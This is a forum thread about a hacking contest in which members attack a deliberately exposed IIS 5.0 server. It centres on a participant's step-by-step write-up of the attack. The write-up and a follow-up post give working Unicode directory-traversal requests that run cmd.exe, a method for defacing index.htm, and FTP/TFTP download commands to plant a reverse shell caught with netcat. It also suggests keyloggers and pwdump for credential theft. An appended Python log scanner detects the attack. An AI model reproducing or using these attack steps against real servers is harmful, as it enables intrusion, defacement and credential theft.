
Security practice (contest)


Comments

  • Closed Accounts Posts: 891 ✭✭✭conceited


    You're connecting from the target host back to yourself, right?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Yeah, I've done this before with the netapi exploit back in 06.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Have a think about it.

    It will come to you :)
    I'm going to start her up there now so.
    Be up in 5 mins.
    Good luck


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Cheers.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    The webserver is down or has crashed.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Try not to crash it, as I had to reboot the server.
    How are you getting on?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Well, I got my name on the webpage.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    HAHA, brilliant stuff Damo :) Very good.

    If you don't mind would you write out a short report?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I can do, but not yet, we'll see who else gets in.. I hope they append to index.htm and not overwrite it :)

    I hoped to be able to get a "nicer" method of access to the server; although this is possible by installing external software remotely, I don't think it is needed or wanted here.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    I'm looking through the logs and can see how you did it.
    You're the only person as far as netstat is concerned.
    I'll leave it up for a few hours anyway and hope they don't delete yours :)
    EDIT
    Didn't see all your post.
    Ya fire away, and if you wanted to try out what you said wasn't possible earlier, do that as well.
    You see, I could open an alternate port on your server via exploit, but your router would not forward this port to your win2k machine, so instead you use an exploit to make your win2k machine connect back to me, reversing a shell at the same time.

    Good practice


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I was going by a false positive reading from a scan yesterday, which proved in fact not to be vulnerable, so I used a different attack today which seemed better :)

    Hehe, people please use >> and not > now! :-)
    If you don't understand that, you won't be needin' it :p


  • Closed Accounts Posts: 891 ✭✭✭conceited


    I'm glad you were able to figure it out.
    I'll post back in a minute, I'm watching the tennis.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    My friend reports it's down now.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    He crashed it. :pac:
    Back up now.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Yeah, I think trying to execute shellcode via the weakness is crashing it instead of doing what it's supposed to do :)


  • Closed Accounts Posts: 891 ✭✭✭conceited


    I'll check the logs in a min.
    Tennis is back on.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    In case someone overwrites the index.htm file:

    [screenshot attached: screenshotmozillafirefooa0.png]


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Hope to have more challenges like this in the future.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    I found the error making the server crash.
    Out-of-process+ISAPI+extension+request+failed
    I read up a little about it but I don't care to be honest.
    New challenges of course.
    I'll put something a little tougher together next time.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Are there many other people trying it?


  • Closed Accounts Posts: 891 ✭✭✭conceited


    1 other person got in it seems: livewire 06-07-08 12:18

    I'm turning it off now and will prepare another one soon.
    Glad you had fun.


  • Registered Users, Registered Users 2 Posts: 1,726 ✭✭✭gerryk


    Why so soon... I thought you'd leave it up for a few days at least. Sadly other things sometimes take priority over pwning boxes.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    It was good fun, but you gotta be quick!


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Gerry, it was advertised from the 4th to last night. Where were ya boy. :pac:
    I can put it up. But you know the OS, SP and the network layout. And probably even the method used.

    Damo2k, do you want me to do the report from my side or what? Let me know.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I'll type out some stuff, I'll pm it to ya, you can read over it and make any modifications as necessary...


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Ok thanks.
    It will be a good learning experience for everyone.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I used Linux for this but Windows should be fine also.. (the server was down while I was typing this so typos or mistakes might exist below)

    You can use either
    Web Browser or
    Telnet or
    Perl or other ways, you can use your imagination.


    OK, we are given an IP address: 86.41.138.247.

    First thing I do is check for basic services like webserver/ftp/ssh/telnet on 86.41.138.247... but nothing.

    To see what services are being offered by this IP, I used a security scanner called Nessus. There are many scanners that do the same job, like X-Scan, Retina Network Scanner, Nmap and many more, but Nessus is my choice.

    Do a quick scan of 86.41.138.247 with Nessus (Use google if you don't know how to use Nessus).

    Nessus will report that there is a web-server listening on port 8080, IIS 5.0. It will also report a number of holes/vulnerabilities on this specific IIS.
    One of these vulnerabilities being the IIS Unicode Vulnerability.

    Once you have identified a weakness, you can launch an attack/exploit against it.
    A quick Google search for IIS 5.0 exploits gives many results :-)

    I went with the IIS Unicode bug...
    You can google this if you want an explanation as to what this is and why this attack works on IIS.

    In your browser go to the following url:



    This should give you a directory listing of the C:\ drive.
    Note the WEB_ROOT folder.

    NOTE: If this url gives trouble in your browser, do this instead:
    telnet 86.41.138.247 8080
    (in here type:)
    GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0
    (hit return twice)


    The idea of this contest is to get your name on the webserver, preferably the main page (index.???)

    Let's list the contents of WEB_ROOT:


    Ah index.htm :-D

    Now we need to add our name onto that: ( > for create/write, >> for append/write )


    Wtf? "Incorrect parameter" or some crap returned, even if you use the telnet method above, and if you URL-encode the URL above, e.g. >> to %3E%3E.
    This took me a while to get past; after a lot of Google searching, it seems IIS has an input/output restriction on cmd.exe.

    How do we get past that? Simple...
    Copy cmd.exe to a different location with a different name and use that.. that's all!


    Note newcmd.exe will be in the current dir which is:
    c:\inetpub\scripts\

    Now execute:



    Again, if your browser gives trouble, try encoding the non-friendly URL chars or use the telnet method above.. or....
    For the lazy, here is a perl script which will do this for you automatically:
    http://www.milw0rm.com/exploits/192

    Now if you browse to http://86.41.138.247:8080 you should see your name.

    To make things really fancy, compile a win32 reverse shell src like the following (obviously putting your port and IP in the src):
    http://archive.cert.uni-stuttgart.de/vuln-dev/2003/02/msg00015.html

    Host it on your TFTP server (a bit easier than an FTP server).
    There are many stand-alone executable TFTP servers for Windows, and if you're on Linux chances are you already have one, you just need to set it up.

    Now make the victim server download your reverse shell:


    This will pull the file across to the victim via TFTP server.

    If it's on FTP, it's a bit harder, you need to execute these commands (using the URL like before, which I haven't typed here). Note that after "open", the ftp client reads the next two lines as the username and password, so they go in bare, without "open":
    echo open 111.222.333.444 > ftp.txt
    echo loginname >> ftp.txt
    echo mypassword >> ftp.txt
    echo get yourshell.exe >> ftp.txt
    echo bye >> ftp.txt
    ftp -i -s:ftp.txt

    This will pull the file across to the victim via FTP server.

    On your own PC/server start a netcat session for whatever port you compiled into your shell src (make sure you forward this port through your router/gateway and have it open in the firewall, allowing access to your PC with the netcat session):
    nc -l -p xxxx

    Execute the reverse shell on the victim:


    If all goes well, you should have shell access to the victim server in your netcat session.


    Of course this is just an idea. Many other undesirable executables could be transferred across, like vnc, serv-u (this has exec support), keylogger, spyware, adware, scumware, pwdump2 (grab login credentials and break them using online LM rainbow tables in seconds).


    Just a side note here: as this was a webserver-specific weakness, it would have been found using specific webserver scanners such as Nikto (Wikto is the Windows port). I recommend you look at these tools.


    damohere at gmail . com


  • Registered Users, Registered Users 2 Posts: 13 livewire2k


    Hello,

    Nice work conceited, I enjoyed that challenge, I'm hoping there will be more!

    peace Livewire!


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Hi lads.

    Damo2k, that's a great report you did there, nice and detailed.
    I sent you a PM as I had some issues getting the >> working.
    I was tinkering around with tftp and netcat, a lot easier on a LAN. :)
    livewire2k, glad you enjoyed it and I'll keep putting up servers every few days.
    They won't be as easy as this one. :D


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Just an update.
    I used that perl script and loaded up Ethereal and had a look at the request.

    All these work fine now.
    Change the "\ = C1 9C" to "/ = C0 AF" in the examples.
    There was no trouble encoding >> all along, everything works in the browser.


    telnet
    GET /scripts/..%c0%af../inetpub/scripts/sensepost.exe?/c+echo+CONCEITED+%3E%3E+c:\WEB_ROOT\index.htm HTTP/1.0

    firefox+IE

    firefox+IE

    All these work fine for me now.
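As an added example, not part of the thread or of Damo2k's report, here is the kind of log check conceited describes doing by hand: it decodes each request the way IIS 5.0 effectively did, so the %c1%9c and %c0%af overlong sequences from the report and the follow-up post fold back to \ and /, and flags requests that traverse out of the web root or target an executable. The W3C-style log lines are constructed for the example, not taken from the contest server.

```python
from urllib.parse import unquote_to_bytes

# Constructed IIS 5.0 style W3C log lines (not from the contest server).
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2008-07-06 12:18:01 10.0.0.5 GET /index.htm - 200
2008-07-06 12:18:09 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir+c: 200
2008-07-06 12:18:40 10.0.0.5 GET /scripts/..%c0%af../inetpub/scripts/newcmd.exe /c+echo+NAME+%3E%3E+c:\\WEB_ROOT\\index.htm 200
2008-07-06 12:19:02 10.0.0.9 GET /images/logo%20small.gif - 200
"""

def decode_lenient(raw):
    """Percent-decode the way IIS 5.0 effectively did: an overlong 2-byte UTF-8
    sequence (lead byte 0xC0 or 0xC1) is folded to the ASCII byte it spells.
    %c0%af -> '/' and %c1%9c -> '\\' is exactly what the Unicode bug abused.
    Returns (decoded_text, overlong_seen)."""
    data = unquote_to_bytes(raw)
    out, overlong, i = bytearray(), False, 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            overlong, i = True, i + 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1"), overlong

def classify(line):
    """Reasons a single log line looks like IIS Unicode traversal (empty if clean)."""
    parts = line.split()
    if len(parts) < 6:
        return []
    path, overlong = decode_lenient(parts[4])
    norm = path.replace("\\", "/").lower()
    reasons = []
    if overlong:                      # C0/C1 lead bytes never appear in valid UTF-8
        reasons.append("overlong-utf8")
    if "/../" in norm or norm.endswith("/.."):
        reasons.append("dot-dot-traversal")
    if norm.endswith(".exe"):         # request aimed at an executable, not a page
        reasons.append("executable-target")
    return reasons

def scan(log):
    """Map 1-based line numbers of suspicious requests to their reasons."""
    return {n: r for n, l in enumerate(log.splitlines(), 1) if (r := classify(l))}
```

Running `scan(SAMPLE_LOG)` flags lines 2 and 3 on all three counts; the overlong-UTF-8 signal alone is enough, since no legitimate client emits a C0 or C1 lead byte.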

